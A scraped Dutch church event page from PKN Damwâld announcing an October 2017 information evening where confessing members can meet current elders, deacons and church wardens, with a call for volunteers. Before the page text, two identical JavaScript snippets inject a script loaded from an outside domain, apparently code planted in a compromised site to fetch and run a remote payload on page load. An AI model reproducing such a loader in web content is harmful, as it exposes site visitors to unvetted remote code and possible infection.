;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Meet & Greet Hervormd Akkerwoude c.a. - PKN Damwâld
9 oktober 2017
19:30 t/m 21:30
't Skûlplak
Meet & Greet Hervormd Akkerwoude c.a.

Maandag 9 oktober om 19.30 uur is er in ’t Skûlplak een informatieavond voor alle belijdende leden van Hervormd Akkerwoude c.a.  Onder het genot van een kop koffie kun je kennismaken met onze huidige (jeugd-) ouderlingen, kerkrentmeesters en diakenen en krijg je alle gelegenheid om de huidige ambtsdragers te vragen ‘wat zij doen, hoe hun ambt hen bevalt, wat zij er plezierig aan vinden en wat hen juist moeite kost’. Er wordt informatie gegeven en er is gelegenheid om vragen te stellen over het reilen en zeilen of activiteiten binnen onze kerk. De bijeenkomst duurt tot uiterlijk 21.30 uur.
We hopen dat er veel belijdende leden komen om even te snuffelen aan het ambtswerk. En dat duidelijk wordt dat het echt nodig is dat deze vacatures ingevuld worden. Er zijn heel wat mensen die al een taak hebben in de gemeente, van koster tot beamercommissie; bij elkaar zo’n tweehonderd vrijwilligers. Maar we hopen dat we in het bijzonder mensen ook warm krijgen voor het pastoraat. We willen graag met je in gesprek gaan – om te kijken wat je zou willen en kunnen doen, waar je hart ligt en welke kwaliteit jij zou willen inzetten!

Locatie: 't SkûlplakBûterblom 8, 9104 JE Damwâld